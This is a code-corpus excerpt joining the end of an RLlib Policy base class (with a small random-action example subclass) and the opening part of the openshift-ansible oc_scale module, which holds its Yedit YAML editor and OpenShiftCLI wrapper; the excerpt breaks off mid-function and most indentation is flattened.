episode (MultiAgentEpisode): this provides access to all of the
internal episode state, which may be useful for model-based or
multi-agent algorithms.
Returns:
SampleBatch: postprocessed sample batch.
"""
return sample_batch
@DeveloperAPI
def learn_on_batch(self, samples):
"""Fused compute gradients and apply gradients call.
Either this or the combination of compute/apply grads must be
implemented by subclasses.
Returns:
grad_info: dictionary of extra metadata from compute_gradients().
Examples:
>>> batch = ev.sample()
            >>> ev.learn_on_batch(batch)
"""
grads, grad_info = self.compute_gradients(samples)
self.apply_gradients(grads)
return grad_info
@DeveloperAPI
def compute_gradients(self, postprocessed_batch):
"""Computes gradients against a batch of experiences.
Either this or learn_on_batch() must be implemented by subclasses.
Returns:
grads (list): List of gradient output values
info (dict): Extra policy-specific values
"""
raise NotImplementedError
@DeveloperAPI
def apply_gradients(self, gradients):
"""Applies previously computed gradients.
Either this or learn_on_batch() must be implemented by subclasses.
"""
raise NotImplementedError
@DeveloperAPI
def get_weights(self):
"""Returns model weights.
Returns:
weights (obj): Serializable copy or view of model weights
"""
raise NotImplementedError
@DeveloperAPI
def set_weights(self, weights):
"""Sets model weights.
Arguments:
weights (obj): Serializable copy or view of model weights
"""
raise NotImplementedError
@DeveloperAPI
def get_initial_state(self):
"""Returns initial RNN state for the current policy."""
return []
@DeveloperAPI
def get_state(self):
"""Saves all local state.
Returns:
state (obj): Serialized local state.
"""
return self.get_weights()
@DeveloperAPI
def set_state(self, state):
"""Restores all local state.
Arguments:
state (obj): Serialized local state.
"""
self.set_weights(state)
@DeveloperAPI
def on_global_var_update(self, global_vars):
"""Called on an update to global vars.
Arguments:
global_vars (dict): Global variables broadcast from the driver.
"""
pass
@DeveloperAPI
def export_model(self, export_dir):
"""Export Policy to local directory for serving.
Arguments:
export_dir (str): Local writable directory.
"""
raise NotImplementedError
@DeveloperAPI
def export_checkpoint(self, export_dir):
"""Export Policy checkpoint to local directory.
        Arguments:
export_dir (str): Local writable directory.
"""
raise NotImplementedError
def clip_action(action, space):
"""Called to clip actions to the specified range of this policy.
Arguments:
action: Single action.
space: Action space the actions should be present in.
Returns:
        Clipped action.
"""
if isinstance(space, gym.spaces.Box):
return np.clip(action, space.low, space.high)
elif isinstance(space, gym.spaces.Tuple):
if type(action) not in (tuple, list):
raise ValueError("Expected tuple space for actions {}: {}".format(
action, space))
out = []
for a, s in zip(action, space.spaces):
out.append(clip_action(a, s))
return out
else:
return action
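# Illustrative sketch (not part of RLlib's API surface): a minimal Policy
# subclass that samples uniform-random actions, showing the return shapes the
# compute_actions() contract expects. `_UniformRandomPolicy` is a hypothetical
# name used only for this example.
class _UniformRandomPolicy(Policy):
    """Stateless policy that ignores observations and samples random actions."""
    def compute_actions(self,
                        obs_batch,
                        state_batches,
                        prev_action_batch=None,
                        prev_reward_batch=None,
                        info_batch=None,
                        episodes=None,
                        **kwargs):
        # One random action per observation, RNN state passed through, no info.
        actions = [self.action_space.sample() for _ in obs_batch]
        return actions, state_batches, {}
    def get_weights(self):
        return {}
    def set_weights(self, weights):
        pass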
| apache-2.0 |
maxamillion/openshift-ansible | roles/lib_openshift/library/oc_scale.py | 17 | 66770 | #!/usr/bin/env python
# pylint: disable=missing-docstring
# flake8: noqa: T001
# ___ ___ _ _ ___ ___ _ _____ ___ ___
# / __| __| \| | __| _ \ /_\_ _| __| \
# | (_ | _|| .` | _|| / / _ \| | | _|| |) |
# \___|___|_|\_|___|_|_\/_/_\_\_|_|___|___/_ _____
# | \ / _ \ | \| |/ _ \_ _| | __| \_ _|_ _|
# | |) | (_) | | .` | (_) || | | _|| |) | | | |
# |___/ \___/ |_|\_|\___/ |_| |___|___/___| |_|
#
# Copyright 2016 Red Hat, Inc. and/or its affiliates
# and other contributors as indicated by the @author tags.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -*- -*- -*- Begin included fragment: lib/import.py -*- -*- -*-
'''
OpenShiftCLI class that wraps the oc commands in a subprocess
'''
# pylint: disable=too-many-lines
from __future__ import print_function
import atexit
import copy
import fcntl
import json
import time
import os
import re
import shutil
import subprocess
import tempfile
# pylint: disable=import-error
try:
import ruamel.yaml as yaml
except ImportError:
import yaml
from ansible.module_utils.basic import AnsibleModule
# -*- -*- -*- End included fragment: lib/import.py -*- -*- -*-
# -*- -*- -*- Begin included fragment: doc/scale -*- -*- -*-
DOCUMENTATION = '''
---
module: oc_scale
short_description: Manage openshift services through the scale parameters
description:
- Manage openshift services through scaling them.
options:
state:
description:
- State represents whether to scale or list the current replicas
required: true
default: present
choices: ["present", "list"]
aliases: []
kubeconfig:
description:
- The path for the kubeconfig file to use for authentication
required: false
default: /etc/origin/master/admin.kubeconfig
aliases: []
debug:
description:
- Turn on debug output.
required: false
default: False
aliases: []
name:
description:
- Name of the object that is being queried.
required: false
default: None
aliases: []
namespace:
description:
- The namespace where the object lives.
required: false
default: default
aliases: []
kind:
description:
- The kind of object to scale.
required: false
default: None
choices:
- rc
- dc
aliases: []
author:
- "Kenny Woodson <kwoodson@redhat.com>"
extends_documentation_fragment: []
'''
EXAMPLES = '''
- name: scale down a rc to 0
oc_scale:
name: my-replication-controller
kind: rc
namespace: openshift-infra
replicas: 0
- name: scale up a deploymentconfig to 2
oc_scale:
name: php
kind: dc
namespace: my-php-app
replicas: 2
'''
# -*- -*- -*- End included fragment: doc/scale -*- -*- -*-
# -*- -*- -*- Begin included fragment: ../../lib_utils/src/class/yedit.py -*- -*- -*-
class YeditException(Exception): # pragma: no cover
''' Exception class for Yedit '''
pass
# pylint: disable=too-many-public-methods,too-many-instance-attributes
class Yedit(object): # pragma: no cover
''' Class to modify yaml files '''
re_valid_key = r"(((\[-?\d+\])|([0-9a-zA-Z%s/_-]+)).?)+$"
re_key = r"(?:\[(-?\d+)\])|([0-9a-zA-Z{}/_-]+)"
com_sep = set(['.', '#', '|', ':'])
# pylint: disable=too-many-arguments
def __init__(self,
filename=None,
content=None,
content_type='yaml',
separator='.',
backup_ext=None,
backup=False):
self.content = content
self._separator = separator
self.filename = filename
self.__yaml_dict = content
self.content_type = content_type
self.backup = backup
if backup_ext is None:
self.backup_ext = ".{}".format(time.strftime("%Y%m%dT%H%M%S"))
else:
self.backup_ext = backup_ext
self.load(content_type=self.content_type)
if self.__yaml_dict is None:
self.__yaml_dict = {}
@property
def separator(self):
''' getter method for separator '''
return self._separator
@separator.setter
def separator(self, inc_sep):
''' setter method for separator '''
self._separator = inc_sep
@property
def yaml_dict(self):
''' getter method for yaml_dict '''
return self.__yaml_dict
@yaml_dict.setter
def yaml_dict(self, value):
''' setter method for yaml_dict '''
self.__yaml_dict = value
@staticmethod
def parse_key(key, sep='.'):
'''parse the key allowing the appropriate separator'''
common_separators = list(Yedit.com_sep - set([sep]))
return re.findall(Yedit.re_key.format(''.join(common_separators)), key)
@staticmethod
def valid_key(key, sep='.'):
'''validate the incoming key'''
common_separators = list(Yedit.com_sep - set([sep]))
if not re.match(Yedit.re_valid_key.format(''.join(common_separators)), key):
return False
return True
# pylint: disable=too-many-return-statements,too-many-branches
@staticmethod
def remove_entry(data, key, index=None, value=None, sep='.'):
''' remove data at location key '''
if key == '' and isinstance(data, dict):
if value is not None:
data.pop(value)
elif index is not None:
raise YeditException("remove_entry for a dictionary does not have an index {}".format(index))
else:
data.clear()
return True
elif key == '' and isinstance(data, list):
ind = None
if value is not None:
try:
ind = data.index(value)
except ValueError:
return False
elif index is not None:
ind = index
else:
del data[:]
if ind is not None:
data.pop(ind)
return True
if not (key and Yedit.valid_key(key, sep)) and \
isinstance(data, (list, dict)):
return None
key_indexes = Yedit.parse_key(key, sep)
for arr_ind, dict_key in key_indexes[:-1]:
if dict_key and isinstance(data, dict):
data = data.get(dict_key)
elif (arr_ind and isinstance(data, list) and
int(arr_ind) <= len(data) - 1):
data = data[int(arr_ind)]
else:
return None
# process last index for remove
# expected list entry
if key_indexes[-1][0]:
if isinstance(data, list) and int(key_indexes[-1][0]) <= len(data) - 1: # noqa: E501
del data[int(key_indexes[-1][0])]
return True
# expected dict entry
elif key_indexes[-1][1]:
if isinstance(data, dict):
del data[key_indexes[-1][1]]
return True
@staticmethod
def add_entry(data, key, item=None, sep='.'):
''' Get an item from a dictionary with key notation a.b.c
            d = {'a': {'b': 'c'}}
key = a#b
return c
'''
if key == '':
pass
elif (not (key and Yedit.valid_key(key, sep)) and
isinstance(data, (list, dict))):
return None
key_indexes = Yedit.parse_key(key, sep)
for arr_ind, dict_key in key_indexes[:-1]:
if dict_key:
if isinstance(data, dict) and dict_key in data and data[dict_key]: # noqa: E501
data = data[dict_key]
continue
elif data and not isinstance(data, dict):
raise YeditException("Unexpected item type found while going through key " +
"path: {} (at key: {})".format(key, dict_key))
data[dict_key] = {}
data = data[dict_key]
elif (arr_ind and isinstance(data, list) and
int(arr_ind) <= len(data) - 1):
data = data[int(arr_ind)]
else:
raise YeditException("Unexpected item type found while going through key path: {}".format(key))
if key == '':
data = item
# process last index for add
# expected list entry
elif key_indexes[-1][0] and isinstance(data, list) and int(key_indexes[-1][0]) <= len(data) - 1: # noqa: E501
data[int(key_indexes[-1][0])] = item
# expected dict entry
elif key_indexes[-1][1] and isinstance(data, dict):
data[key_indexes[-1][1]] = item
# didn't add/update to an existing list, nor add/update key to a dict
# so we must have been provided some syntax like a.b.c[<int>] = "data" for a
# non-existent array
else:
raise YeditException("Error adding to object at path: {}".format(key))
return data
@staticmethod
def get_entry(data, key, sep='.'):
''' Get an item from a dictionary with key notation a.b.c
            d = {'a': {'b': 'c'}}
key = a.b
return c
'''
if key == '':
pass
elif (not (key and Yedit.valid_key(key, sep)) and
isinstance(data, (list, dict))):
return None
key_indexes = Yedit.parse_key(key, sep)
for arr_ind, dict_key in key_indexes:
if dict_key and isinstance(data, dict):
data = data.get(dict_key)
elif (arr_ind and isinstance(data, list) and
int(arr_ind) <= len(data) - 1):
data = data[int(arr_ind)]
else:
return None
return data
@staticmethod
def _write(filename, contents):
''' Actually write the file contents to disk. This helps with mocking. '''
tmp_filename = filename + '.yedit'
with open(tmp_filename, 'w') as yfd:
fcntl.flock(yfd, fcntl.LOCK_EX | fcntl.LOCK_NB)
yfd.write(contents)
fcntl.flock(yfd, fcntl.LOCK_UN)
os.rename(tmp_filename, filename)
def write(self):
''' write to file '''
if not self.filename:
raise YeditException('Please specify a filename.')
if self.backup and self.file_exists():
shutil.copy(self.filename, '{}{}'.format(self.filename, self.backup_ext))
# Try to set format attributes if supported
try:
self.yaml_dict.fa.set_block_style()
except AttributeError:
pass
# Try to use RoundTripDumper if supported.
if self.content_type == 'yaml':
try:
Yedit._write(self.filename, yaml.dump(self.yaml_dict, Dumper=yaml.RoundTripDumper))
except AttributeError:
Yedit._write(self.filename, yaml.safe_dump(self.yaml_dict, default_flow_style=False))
elif self.content_type == 'json':
Yedit._write(self.filename, json.dumps(self.yaml_dict, indent=4, sort_keys=True))
else:
raise YeditException('Unsupported content_type: {}.'.format(self.content_type) +
'Please specify a content_type of yaml or json.')
return (True, self.yaml_dict)
def read(self):
''' read from file '''
# check if it exists
if self.filename is None or not self.file_exists():
return None
contents = None
with open(self.filename) as yfd:
contents = yfd.read()
return contents
def file_exists(self):
''' return whether file exists '''
if os.path.exists(self.filename):
return True
return False
def load(self, content_type='yaml'):
''' return yaml file '''
contents = self.read()
if not contents and not self.content:
return None
if self.content:
if isinstance(self.content, dict):
self.yaml_dict = self.content
return self.yaml_dict
elif isinstance(self.content, str):
contents = self.content
# check if it is yaml
try:
if content_type == 'yaml' and contents:
# Try to set format attributes if supported
try:
self.yaml_dict.fa.set_block_style()
except AttributeError:
pass
# Try to use RoundTripLoader if supported.
try:
self.yaml_dict = yaml.load(contents, yaml.RoundTripLoader)
except AttributeError:
self.yaml_dict = yaml.safe_load(contents)
# Try to set format attributes if supported
try:
self.yaml_dict.fa.set_block_style()
except AttributeError:
pass
elif content_type == 'json' and contents:
self.yaml_dict = json.loads(contents)
except yaml.YAMLError as err:
# Error loading yaml or json
raise YeditException('Problem with loading yaml file. {}'.format(err))
return self.yaml_dict
def get(self, key):
''' get a specified key'''
try:
entry = Yedit.get_entry(self.yaml_dict, key, self.separator)
except KeyError:
entry = None
return entry
def pop(self, path, key_or_item):
''' remove a key, value pair from a dict or an item for a list'''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError:
entry = None
if entry is None:
return (False, self.yaml_dict)
if isinstance(entry, dict):
# AUDIT:maybe-no-member makes sense due to fuzzy types
# pylint: disable=maybe-no-member
if key_or_item in entry:
entry.pop(key_or_item)
return (True, self.yaml_dict)
return (False, self.yaml_dict)
elif isinstance(entry, list):
# AUDIT:maybe-no-member makes sense due to fuzzy types
# pylint: disable=maybe-no-member
ind = None
try:
ind = entry.index(key_or_item)
except ValueError:
return (False, self.yaml_dict)
entry.pop(ind)
return (True, self.yaml_dict)
return (False, self.yaml_dict)
def delete(self, path, index=None, value=None):
''' remove path from a dict'''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError:
entry = None
if entry is None:
return (False, self.yaml_dict)
result = Yedit.remove_entry(self.yaml_dict, path, index, value, self.separator)
if not result:
return (False, self.yaml_dict)
return (True, self.yaml_dict)
def exists(self, path, value):
''' check if value exists at path'''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError:
entry = None
if isinstance(entry, list):
if value in entry:
return True
return False
elif isinstance(entry, dict):
if isinstance(value, dict):
rval = False
for key, val in value.items():
if entry[key] != val:
rval = False
break
else:
rval = True
return rval
return value in entry
return entry == value
def append(self, path, value):
'''append value to a list'''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError:
entry = None
if entry is None:
self.put(path, [])
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
if not isinstance(entry, list):
return (False, self.yaml_dict)
# AUDIT:maybe-no-member makes sense due to loading data from
# a serialized format.
# pylint: disable=maybe-no-member
entry.append(value)
return (True, self.yaml_dict)
# pylint: disable=too-many-arguments
def update(self, path, value, index=None, curr_value=None):
''' put path, value into a dict '''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError:
entry = None
if isinstance(entry, dict):
# AUDIT:maybe-no-member makes sense due to fuzzy types
# pylint: disable=maybe-no-member
if not isinstance(value, dict):
raise YeditException('Cannot replace key, value entry in dict with non-dict type. ' +
'value=[{}] type=[{}]'.format(value, type(value)))
entry.update(value)
return (True, self.yaml_dict)
elif isinstance(entry, list):
# AUDIT:maybe-no-member makes sense due to fuzzy types
# pylint: disable=maybe-no-member
ind = None
if curr_value:
try:
ind = entry.index(curr_value)
except ValueError:
return (False, self.yaml_dict)
elif index is not None:
ind = index
if ind is not None and entry[ind] != value:
entry[ind] = value
return (True, self.yaml_dict)
# see if it exists in the list
try:
ind = entry.index(value)
except ValueError:
# doesn't exist, append it
entry.append(value)
return (True, self.yaml_dict)
# already exists, return
if ind is not None:
return (False, self.yaml_dict)
return (False, self.yaml_dict)
def put(self, path, value):
''' put path, value into a dict '''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError:
entry = None
if entry == value:
return (False, self.yaml_dict)
# deepcopy didn't work
# Try to use ruamel.yaml and fallback to pyyaml
try:
tmp_copy = yaml.load(yaml.round_trip_dump(self.yaml_dict,
default_flow_style=False),
yaml.RoundTripLoader)
except AttributeError:
tmp_copy = copy.deepcopy(self.yaml_dict)
# set the format attributes if available
try:
tmp_copy.fa.set_block_style()
except AttributeError:
pass
result = Yedit.add_entry(tmp_copy, path, value, self.separator)
if result is None:
return (False, self.yaml_dict)
# When path equals "" it is a special case.
# "" refers to the root of the document
        # Only update the root path (entire document) when it's a list or dict
if path == '':
if isinstance(result, list) or isinstance(result, dict):
self.yaml_dict = result
return (True, self.yaml_dict)
return (False, self.yaml_dict)
self.yaml_dict = tmp_copy
return (True, self.yaml_dict)
def create(self, path, value):
''' create a yaml file '''
if not self.file_exists():
# deepcopy didn't work
# Try to use ruamel.yaml and fallback to pyyaml
try:
tmp_copy = yaml.load(yaml.round_trip_dump(self.yaml_dict,
default_flow_style=False),
yaml.RoundTripLoader)
except AttributeError:
tmp_copy = copy.deepcopy(self.yaml_dict)
# set the format attributes if available
try:
tmp_copy.fa.set_block_style()
except AttributeError:
pass
result = Yedit.add_entry(tmp_copy, path, value, self.separator)
if result is not None:
self.yaml_dict = tmp_copy
return (True, self.yaml_dict)
return (False, self.yaml_dict)
@staticmethod
def get_curr_value(invalue, val_type):
'''return the current value'''
if invalue is None:
return None
curr_value = invalue
if val_type == 'yaml':
curr_value = yaml.safe_load(str(invalue))
elif val_type == 'json':
curr_value = json.loads(invalue)
return curr_value
@staticmethod
def parse_value(inc_value, vtype=''):
'''determine value type passed'''
true_bools = ['y', 'Y', 'yes', 'Yes', 'YES', 'true', 'True', 'TRUE',
'on', 'On', 'ON', ]
false_bools = ['n', 'N', 'no', 'No', 'NO', 'false', 'False', 'FALSE',
'off', 'Off', 'OFF']
# It came in as a string but you didn't specify value_type as string
# we will convert to bool if it matches any of the above cases
if isinstance(inc_value, str) and 'bool' in vtype:
if inc_value not in true_bools and inc_value not in false_bools:
raise YeditException('Not a boolean type. str=[{}] vtype=[{}]'.format(inc_value, vtype))
elif isinstance(inc_value, bool) and 'str' in vtype:
inc_value = str(inc_value)
        # There is a special case where '' will turn into None after yaml loads it, so skip
if isinstance(inc_value, str) and inc_value == '':
pass
# If vtype is not str then go ahead and attempt to yaml load it.
elif isinstance(inc_value, str) and 'str' not in vtype:
try:
inc_value = yaml.safe_load(inc_value)
except Exception:
raise YeditException('Could not determine type of incoming value. ' +
'value=[{}] vtype=[{}]'.format(type(inc_value), vtype))
return inc_value
@staticmethod
def process_edits(edits, yamlfile):
'''run through a list of edits and process them one-by-one'''
results = []
for edit in edits:
value = Yedit.parse_value(edit['value'], edit.get('value_type', ''))
if edit.get('action') == 'update':
# pylint: disable=line-too-long
curr_value = Yedit.get_curr_value(
Yedit.parse_value(edit.get('curr_value')),
edit.get('curr_value_format'))
rval = yamlfile.update(edit['key'],
value,
edit.get('index'),
curr_value)
elif edit.get('action') == 'append':
rval = yamlfile.append(edit['key'], value)
else:
rval = yamlfile.put(edit['key'], value)
if rval[0]:
results.append({'key': edit['key'], 'edit': rval[1]})
return {'changed': len(results) > 0, 'results': results}
# pylint: disable=too-many-return-statements,too-many-branches
@staticmethod
def run_ansible(params):
'''perform the idempotent crud operations'''
yamlfile = Yedit(filename=params['src'],
backup=params['backup'],
content_type=params['content_type'],
backup_ext=params['backup_ext'],
separator=params['separator'])
state = params['state']
if params['src']:
rval = yamlfile.load()
if yamlfile.yaml_dict is None and state != 'present':
return {'failed': True,
'msg': 'Error opening file [{}]. Verify that the '.format(params['src']) +
                           'file exists, that it has correct permissions, and is valid yaml.'}
if state == 'list':
if params['content']:
content = Yedit.parse_value(params['content'], params['content_type'])
yamlfile.yaml_dict = content
if params['key']:
rval = yamlfile.get(params['key'])
return {'changed': False, 'result': rval, 'state': state}
elif state == 'absent':
if params['content']:
content = Yedit.parse_value(params['content'], params['content_type'])
yamlfile.yaml_dict = content
if params['update']:
rval = yamlfile.pop(params['key'], params['value'])
else:
rval = yamlfile.delete(params['key'], params['index'], params['value'])
if rval[0] and params['src']:
yamlfile.write()
return {'changed': rval[0], 'result': rval[1], 'state': state}
elif state == 'present':
# check if content is different than what is in the file
if params['content']:
content = Yedit.parse_value(params['content'], params['content_type'])
# We had no edits to make and the contents are the same
if yamlfile.yaml_dict == content and \
params['value'] is None:
return {'changed': False, 'result': yamlfile.yaml_dict, 'state': state}
yamlfile.yaml_dict = content
# If we were passed a key, value then
        # we encapsulate it in a list and process it
# Key, Value passed to the module : Converted to Edits list #
edits = []
_edit = {}
if params['value'] is not None:
_edit['value'] = params['value']
_edit['value_type'] = params['value_type']
_edit['key'] = params['key']
if params['update']:
_edit['action'] = 'update'
_edit['curr_value'] = params['curr_value']
_edit['curr_value_format'] = params['curr_value_format']
_edit['index'] = params['index']
elif params['append']:
_edit['action'] = 'append'
edits.append(_edit)
elif params['edits'] is not None:
edits = params['edits']
if edits:
results = Yedit.process_edits(edits, yamlfile)
# if there were changes and a src provided to us we need to write
if results['changed'] and params['src']:
yamlfile.write()
return {'changed': results['changed'], 'result': results['results'], 'state': state}
# no edits to make
if params['src']:
# pylint: disable=redefined-variable-type
rval = yamlfile.write()
return {'changed': rval[0],
'result': rval[1],
'state': state}
# We were passed content but no src, key or value, or edits. Return contents in memory
return {'changed': False, 'result': yamlfile.yaml_dict, 'state': state}
        return {'failed': True, 'msg': 'Unknown state passed'}
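# Illustrative sketch (hypothetical helper, not used by this module): how
# Yedit's separator-based key notation reads and writes nested values.
def _yedit_example():
    yed = Yedit(content={'a': {'b': {'c': 'd'}}})
    assert yed.get('a.b.c') == 'd'  # default '.' separator
    yed.separator = '#'
    yed.put('a#b#e', 'f')           # create a sibling key under a.b
    return yed.yaml_dict            # {'a': {'b': {'c': 'd', 'e': 'f'}}}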
# -*- -*- -*- End included fragment: ../../lib_utils/src/class/yedit.py -*- -*- -*-
# -*- -*- -*- Begin included fragment: lib/base.py -*- -*- -*-
# pylint: disable=too-many-lines
# noqa: E301,E302,E303,T001
class OpenShiftCLIError(Exception):
'''Exception class for openshiftcli'''
pass
ADDITIONAL_PATH_LOOKUPS = ['/usr/local/bin', os.path.expanduser('~/bin')]
def locate_oc_binary():
''' Find and return oc binary file '''
# https://github.com/openshift/openshift-ansible/issues/3410
# oc can be in /usr/local/bin in some cases, but that may not
# be in $PATH due to ansible/sudo
paths = os.environ.get("PATH", os.defpath).split(os.pathsep) + ADDITIONAL_PATH_LOOKUPS
oc_binary = 'oc'
# Use shutil.which if it is available, otherwise fallback to a naive path search
try:
which_result = shutil.which(oc_binary, path=os.pathsep.join(paths))
if which_result is not None:
oc_binary = which_result
except AttributeError:
for path in paths:
if os.path.exists(os.path.join(path, oc_binary)):
oc_binary = os.path.join(path, oc_binary)
break
return oc_binary
# pylint: disable=too-few-public-methods
class OpenShiftCLI(object):
''' Class to wrap the command line tools '''
def __init__(self,
namespace,
kubeconfig='/etc/origin/master/admin.kubeconfig',
verbose=False,
all_namespaces=False):
''' Constructor for OpenshiftCLI '''
self.namespace = namespace
self.verbose = verbose
self.kubeconfig = Utils.create_tmpfile_copy(kubeconfig)
self.all_namespaces = all_namespaces
self.oc_binary = locate_oc_binary()
# Pylint allows only 5 arguments to be passed.
# pylint: disable=too-many-arguments
def _replace_content(self, resource, rname, content, edits=None, force=False, sep='.'):
''' replace the current object with the content '''
res = self._get(resource, rname)
if not res['results']:
return res
fname = Utils.create_tmpfile(rname + '-')
yed = Yedit(fname, res['results'][0], separator=sep)
updated = False
if content is not None:
changes = []
for key, value in content.items():
changes.append(yed.put(key, value))
if any([change[0] for change in changes]):
updated = True
elif edits is not None:
results = Yedit.process_edits(edits, yed)
if results['changed']:
updated = True
if updated:
yed.write()
atexit.register(Utils.cleanup, [fname])
return self._replace(fname, force)
return {'returncode': 0, 'updated': False}
def _replace(self, fname, force=False):
'''replace the current object with oc replace'''
# We are removing the 'resourceVersion' to handle
# a race condition when modifying oc objects
yed = Yedit(fname)
results = yed.delete('metadata.resourceVersion')
if results[0]:
yed.write()
cmd = ['replace', '-f', fname]
if force:
cmd.append('--force')
return self.openshift_cmd(cmd)
def _create_from_content(self, rname, content):
'''create a temporary file and then call oc create on it'''
fname = Utils.create_tmpfile(rname + '-')
yed = Yedit(fname, content=content)
yed.write()
atexit.register(Utils.cleanup, [fname])
return self._create(fname)
def _create(self, fname):
'''call oc create on a filename'''
return self.openshift_cmd(['create', '-f', fname])
def _delete(self, resource, name=None, selector=None):
'''call oc delete on a resource'''
cmd = ['delete', resource]
if selector is not None:
cmd.append('--selector={}'.format(selector))
elif name is not None:
cmd.append(name)
else:
raise OpenShiftCLIError('Either name or selector is required when calling delete.')
return self.openshift_cmd(cmd)
def _process(self, template_name, create=False, params=None, template_data=None): # noqa: E501
'''process a template
template_name: the name of the template to process
create: whether to send to oc create after processing
params: the parameters for the template
template_data: the incoming template's data; instead of a file
'''
cmd = ['process']
if template_data:
cmd.extend(['-f', '-'])
else:
cmd.append(template_name)
if params:
param_str = ["{}={}".format(key, str(value).replace("'", r'"')) for key, value in params.items()]
cmd.append('-p')
cmd.extend(param_str)
results = self.openshift_cmd(cmd, output=True, input_data=template_data)
if results['returncode'] != 0 or not create:
return results
fname = Utils.create_tmpfile(template_name + '-')
yed = Yedit(fname, results['results'])
yed.write()
atexit.register(Utils.cleanup, [fname])
return self.openshift_cmd(['create', '-f', fname])
def _get(self, resource, name=None, selector=None, field_selector=None):
'''return a resource by name '''
cmd = ['get', resource]
if selector is not None:
cmd.append('--selector={}'.format(selector))
if field_selector is not None:
cmd.append('--field-selector={}'.format(field_selector))
# Name cannot be used with selector or field_selector.
if selector is None and field_selector is None and name is not None:
cmd.append(name)
cmd.extend(['-o', 'json'])
rval = self.openshift_cmd(cmd, output=True)
        # Ensure results are returned in an array
if 'items' in rval:
rval['results'] = rval['items']
elif not isinstance(rval['results'], list):
rval['results'] = [rval['results']]
return rval
def _schedulable(self, node=None, selector=None, schedulable=True):
        ''' perform oadm manage-node schedulable '''
cmd = ['manage-node']
if node:
cmd.extend(node)
else:
cmd.append('--selector={}'.format(selector))
cmd.append('--schedulable={}'.format(schedulable))
return self.openshift_cmd(cmd, oadm=True, output=True, output_type='raw') # noqa: E501
def _list_pods(self, node=None, selector=None, pod_selector=None):
''' perform oadm list pods
node: the node in which to list pods
selector: the label selector filter if provided
pod_selector: the pod selector filter if provided
'''
cmd = ['manage-node']
if node:
cmd.extend(node)
else:
cmd.append('--selector={}'.format(selector))
if pod_selector:
cmd.append('--pod-selector={}'.format(pod_selector))
cmd.extend(['--list-pods', '-o', 'json'])
return self.openshift_cmd(cmd, oadm=True, output=True, output_type='raw')
# pylint: disable=too-many-arguments
def _evacuate(self, node=None, selector=None, pod_selector=None, dry_run=False, grace_period=None, force=False):
''' perform oadm manage-node evacuate '''
cmd = ['manage-node']
if node:
cmd.extend(node)
else:
cmd.append('--selector={}'.format(selector))
if dry_run:
cmd.append('--dry-run')
if pod_selector:
cmd.append('--pod-selector={}'.format(pod_selector))
if grace_period:
cmd.append('--grace-period={}'.format(int(grace_period)))
if force:
cmd.append('--force')
cmd.append('--evacuate')
return self.openshift_cmd(cmd, oadm=True, output=True, output_type='raw')
def _version(self):
''' return the openshift version'''
return self.openshift_cmd(['version'], output=True, output_type='raw')
def _import_image(self, url=None, name=None, tag=None):
''' perform image import '''
cmd = ['import-image']
image = '{0}'.format(name)
if tag:
image += ':{0}'.format(tag)
cmd.append(image)
if url:
cmd.append('--from={0}/{1}'.format(url, image))
cmd.append('-n{0}'.format(self.namespace))
cmd.append('--confirm')
return self.openshift_cmd(cmd)
def _run(self, cmds, input_data):
''' Actually executes the command. This makes mocking easier. '''
curr_env = os.environ.copy()
curr_env.update({'KUBECONFIG': self.kubeconfig})
proc = subprocess.Popen(cmds,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=curr_env)
stdout, stderr = proc.communicate(input_data)
return proc.returncode, stdout.decode('utf-8'), stderr.decode('utf-8')
# pylint: disable=too-many-arguments,too-many-branches
def openshift_cmd(self, cmd, oadm=False, output=False, output_type='json', input_data=None):
'''Base command for oc '''
cmds = [self.oc_binary]
if oadm:
cmds.append('adm')
cmds.extend(cmd)
if self.all_namespaces:
cmds.extend(['--all-namespaces'])
        elif self.namespace is not None and self.namespace.lower() not in ['none', 'empty']:  # E501
cmds.extend(['-n', self.namespace])
if self.verbose:
print(' '.join(cmds))
try:
returncode, stdout, stderr = self._run(cmds, input_data)
except OSError as ex:
returncode, stdout, stderr = 1, '', 'Failed to execute {}: {}'.format(subprocess.list2cmdline(cmds), ex)
rval = {"returncode": returncode,
"cmd": ' '.join(cmds)}
if output_type == 'json':
rval['results'] = {}
if output and stdout:
try:
rval['results'] = json.loads(stdout)
except ValueError as verr:
if "No JSON object could be decoded" in verr.args:
rval['err'] = verr.args
elif output_type == 'raw':
rval['results'] = stdout if output else ''
if self.verbose:
print("STDOUT: {0}".format(stdout))
print("STDERR: {0}".format(stderr))
if 'err' in rval or returncode != 0:
rval.update({"stderr": stderr,
"stdout": stdout})
return rval
class Utils(object): # pragma: no cover
''' utilities for openshiftcli modules '''
@staticmethod
def _write(filename, contents):
''' Actually write the file contents to disk. This helps with mocking. '''
with open(filename, 'w') as sfd:
sfd.write(str(contents))
@staticmethod
def create_tmp_file_from_contents(rname, data, ftype='yaml'):
''' create a file in tmp with name and contents'''
tmp = Utils.create_tmpfile(prefix=rname)
if ftype == 'yaml':
# AUDIT:no-member makes sense here due to ruamel.YAML/PyYAML usage
# pylint: disable=no-member
if hasattr(yaml, 'RoundTripDumper'):
Utils._write(tmp, yaml.dump(data, Dumper=yaml.RoundTripDumper))
else:
Utils._write(tmp, yaml.safe_dump(data, default_flow_style=False))
elif ftype == 'json':
Utils._write(tmp, json.dumps(data))
else:
Utils._write(tmp, data)
# Register cleanup when module is done
atexit.register(Utils.cleanup, [tmp])
return tmp
@staticmethod
def create_tmpfile_copy(inc_file):
'''create a temporary copy of a file'''
tmpfile = Utils.create_tmpfile('lib_openshift-')
Utils._write(tmpfile, open(inc_file).read())
# Cleanup the tmpfile
atexit.register(Utils.cleanup, [tmpfile])
return tmpfile
@staticmethod
def create_tmpfile(prefix='tmp'):
